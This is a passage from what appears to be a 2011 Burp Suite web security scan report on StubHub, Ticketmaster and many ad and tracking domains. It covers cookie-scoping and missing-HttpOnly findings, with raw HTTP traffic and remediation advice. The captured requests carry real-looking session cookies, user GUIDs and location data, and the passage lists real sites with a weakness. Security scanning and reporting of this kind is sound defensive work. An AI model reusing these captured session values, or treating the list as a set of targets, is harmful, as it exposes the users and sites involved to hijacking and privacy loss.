s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; TLTHID=EB2903FAB23510B2F895E17C95DDB51E; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119"}

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: Apache
Set-Cookie: TLTHID=EC5CA25EB23510B2D4AA9F0FE0F99B10; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:19:13 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:48 GMT
Vary: Accept-Encoding
Content-Length: 3630
Content-Type: text/css

...div.fsrwin {
border: 1px solid #ACACAC;
}

div.fsrwin div {
background: #FFFFFF none repeat scroll 0;
color: #4D4D4D;
font-family: Arial, Helvetica, Sans-Serif;
font-siz
...[SNIP]...

13.147. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/promotions/scratch/foresee_v1/foresee-surveydef.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=EB2903FAB23510B2F895E17C95DDB51E; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-surveydef.js HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; fsr.a=1311100553264

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: TLTHID=EB2903FAB23510B2F895E17C95DDB51E; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:20:17 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:46 GMT
Vary: Accept-Encoding
Content-Length: 4318
Content-Type: text/javascript

FSR.surveydefs = [{
name: 'purchase',
invite: {
when: 'onentry',
delay: 0
},
pop: {
when: 'now'
},
criteria: {
sp: 32,
lf: 0
...[SNIP]...

13.148. http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/resources/mojito/img/common/welcome_banner.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; Path=/; Domain=.stubhub.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/mojito/img/common/welcome_banner.gif HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; TLTHID=E551BC2EB23510B2DFDBC89D01B99543; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.a=1311100546159

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:39 GMT
Server: Apache
Set-Cookie: TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; Path=/; Domain=.stubhub.com
Last-Modified: Wed, 29 Jun 2011 00:07:08 GMT
Accept-Ranges: bytes
Content-Length: 10048
Cache-Control: max-age=31536000
Expires: Wed, 18 Jul 2012 18:35:39 GMT
Content-Type: image/gif

GIF89a..D.......h.....Lt.......*Z..J|........................................................................!.......,......D......ydi.h..l..p,.tm.x..|....pH,....r.lv>...9.X...v..z...xL.....z.n....|N.
...[SNIP]...

13.149. http://www.ticketmaster.com/json/menu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/json/menu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LANGUAGE=en-us; path=/; domain=.ticketmaster.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json/menu?domain_id=1&brand= HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in; CMPS=9/5zpXwS+lM9dMYILHV6iTnnjHn/JjrEoIh2Xg8PzFxlgu8vzRGTzw==; __cs_rr=1; MAJOR_CATEGORY=10001; foresee.alive=1311100560796; _E=%7B%22flags%22%3A%7B%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
Content-Length: 4755
Date: Tue, 19 Jul 2011 18:36:28 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=238; path=/; domain=.ticketmaster.com
Set-Cookie: LANGUAGE=en-us; path=/; domain=.ticketmaster.com

{"10001":{"links":{"6":{"link":"/Matt-Nathanson-tickets/artist/861263","source_id":2,"position":6,"link_text":"Matt Nathanson"},"3":{"link":"/311-tickets/artist/759806","source_id":2,"position":3,"lin
...[SNIP]...

13.150. http://www.ticketmaster.com/json/search/genremenu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ticketmaster.com
Path:	/json/search/genremenu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LANGUAGE=en-us; path=/; domain=.ticketmaster.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json/search/genremenu?dma_id=238 HTTP/1.1
Host: www.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in; CMPS=9/5zpXwS+lM9dMYILHV6iTnnjHn/JjrEoIh2Xg8PzFxlgu8vzRGTzw==; __cs_rr=1; MAJOR_CATEGORY=10001; foresee.alive=1311100560796; _E=%7B%22flags%22%3A%7B%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-TM-GTM-Origin: tmol-us-ash1
Content-Type: text/javascript; charset=UTF-8
P3P: policyref="/w3c/tmol/p3p.xml", CP="IDC DSP COR NID CURa ADMa DEVa PSAa OUR IND COM NAV INT"
Vary: Accept-Encoding
Content-Length: 735
Date: Tue, 19 Jul 2011 18:36:28 GMT
Connection: close
Set-Cookie: GEO_OMN=ba; path=/; domain=.ticketmaster.com
Set-Cookie: NDMA=238; path=/; domain=.ticketmaster.com
Set-Cookie: LANGUAGE=en-us; path=/; domain=.ticketmaster.com

{"responseHeader":{"status":0,"QTime":7},"response":{"facet_counts":{},"numFound":1403,"docs":[],"start":0},"facet_counts":{"facet_fields":{"SportsBrowseGenre":["Basketball",11,"Boxing",3,"Football",1
...[SNIP]...

14. Cookie without HttpOnly flag set previous next
There are 168 instances of this issue:

http://c.microsoft.com/trans_pixel.aspx
http://investor.realnetworks.com/
http://investor.realnetworks.com/stockquote.cfm
http://rac.custhelp.com/
http://rac.custhelp.com/app/answers/detail/a_id/567/session/L3NpZC9QZkFqRm96aw%3D%3D
http://real.custhelp.com/app/answers/detail/a_id/9058/session/L3NpZC84dWtpRm96aw%3D%3D
http://sales.liveperson.net/visitor/addons/deploy.asp
https://signin.ebay.com/ws/eBayISAPI.dll
http://superpass.custhelp.com/
http://superpass.custhelp.com/app/answers/detail/a_id/8866/session/L3NpZC9TeU9pRm96aw%3D%3D
https://support.discoverbing.com/LTS/default.aspx
http://support.gamehouse.com/
http://support.gamehouse.com/app/answers/detail/a_id/861/
http://support.gamehouse.com/app/answers/list/c/188,624/catname/Game%20issues/session/L3NpZC9GZUNoRm96aw%3D%3D
http://support.gamehouse.com/app/contact
http://t.mookie1.com/t/v1/event
http://www.gamehouse.com/images/subsidiary.png
http://www.stubhub.com/
http://a.netmng.com/hic/
http://a.tribalfusion.com/j.ad
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://admeld.lucidmedia.com/clicksense/admeld/match
http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43
http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43
http://ads.revsci.net/adserver/ako
http://ads.undertone.com/fc.php
http://ads.undertone.com/l
http://api.choicestream.com/instr/api/8e360375d27a5381/a1
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02
http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr
http://bh.contextweb.com/bh/rtset
http://bing.com/
http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669
http://bp.specificclick.net/
http://c.atdmt.com/c.gif
http://c.bing.com/c.gif
http://c.microsoft.com/trans_pixel.asp
http://cdnt.meteorsolutions.com/api/setid
http://cdnt.meteorsolutions.com/api/track
http://clk.atdmt.com/goiframe/213439054/340524297/direct/01
http://clk.specificclick.net/click/v=5
http://d.agkn.com/pixel!t=650!
http://de.ign.com/js.ng/size=728x90&network=tpn&property=gamestop&dechannel=gs_home&pagetype=gs_channel
http://ehg-aaa.hitbox.com/HG
http://g-pixel.invitemedia.com/gmatcher
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/
http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686170_0.jpg
http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686178_1.jpg
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://images.apple.com/global/nav/scripts/globalnav.js
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/global/scripts/apple_core.js
http://images.apple.com/global/scripts/browserdetect.js
http://images.apple.com/global/scripts/content_swap.js
http://images.apple.com/global/scripts/lib/event_mixins.js
http://images.apple.com/global/scripts/lib/prototype.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://images.apple.com/global/scripts/overlay_panel.js
http://images.apple.com/global/scripts/search_decorator.js
http://images.apple.com/global/scripts/swap_view.js
http://images.apple.com/global/scripts/view_master_tracker.js
http://images.apple.com/macpro/scripts/pagenav.js
http://images.apple.com/macpro/scripts/performance.js
http://internetdc.bnymellon.com/dcscqt3z310000c9vrxqgfz0d_7c2w/dcs.gif
http://js.revsci.net/gateway/gw.js
http://lct.salesforce.com/sfga.js
https://login.live.com/login.srf
http://m.webtrends.com/dcsk730ac00000w4taqdiehjf_4b7y/dcs.gif
http://m.webtrends.com/dcsxia05c00000s926v0z4tru_3w4l/dcs.gif
http://majornelson.com/gamercard/index.php
http://maps.google.com/maps
http://media.fastclick.net/w/tre
http://mobileweb.ebay.com/
http://odb.outbrain.com/utils/get
http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808465.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808483.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808492.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808506.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff808522.aspx
http://onlinehelp.microsoft.com/en-us/bing/ff919207.aspx
http://onlinehelp.microsoft.com/en-us/bing/gg276362.aspx
http://p.brilig.com/contact/bct
http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/di.php
http://pixel.rubiconproject.com/tap.php
http://profile.live.com/badge
http://r.turn.com/server/pixel.htm
http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue
http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5
http://rover.ebay.com/rover/1/711-53200-19255-0/1
http://rover.ebay.com/roverimp/0/0/14
http://rover.ebay.com/roversync/
http://rt.legolas-media.com/lgrt
http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js
http://sales.liveperson.net/hc/21661174/
http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png
http://sitelife.boston.com/ver1.0/Direct/Jsonp
http://sitelife.boston.com/ver1.0/Stats/Tracker.gif
http://srx.main.ebayrtm.com/rtm
https://ssl.bing.com/travel/secure/account/overview
http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/dcs.gif
https://support.discoverbing.com/Default.aspx
http://t2.trackalyzer.com/trackalyze.asp
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/450
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://tap.rubiconproject.com/oz/sensor
http://video.msn.com/services/user/info
http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
http://www.adminitrack.com/
http://www.burstnet.com/enlightn/7117//930F/
http://www.burstnet.com/enlightn/7121//7128/
http://www.burstnet.com/enlightn/7177//7F4D/
http://www.clickmanage.com/events/clickevent.aspx
http://www.facebook.com/advertising/
http://www.facebook.com/badges/
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/privacy/explanation.php
http://www.fansnap.com/
http://www.fastteks.com.asp1-14.websitetestlink.com/css/styles.css
http://www.gamestop.com/
http://www.gamestop.com/Recommendations.axd
http://www.googleadservices.com/pagead/aclk
http://www.nne.aaa.com/en-nne/Pages/Home.aspx
http://www.stubhub.com/TeaLeafTarget.html
http://www.stubhub.com/assets/default.css
http://www.stubhub.com/content/getPromoContent
http://www.stubhub.com/favicon.ico
http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js
http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css
http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js
http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif
http://www.ticketmaster.com/json/menu
http://www.ticketmaster.com/json/search/genremenu

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

14.1. http://c.microsoft.com/trans_pixel.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://c.microsoft.com
Path:	/trans_pixel.aspx

Issue detail

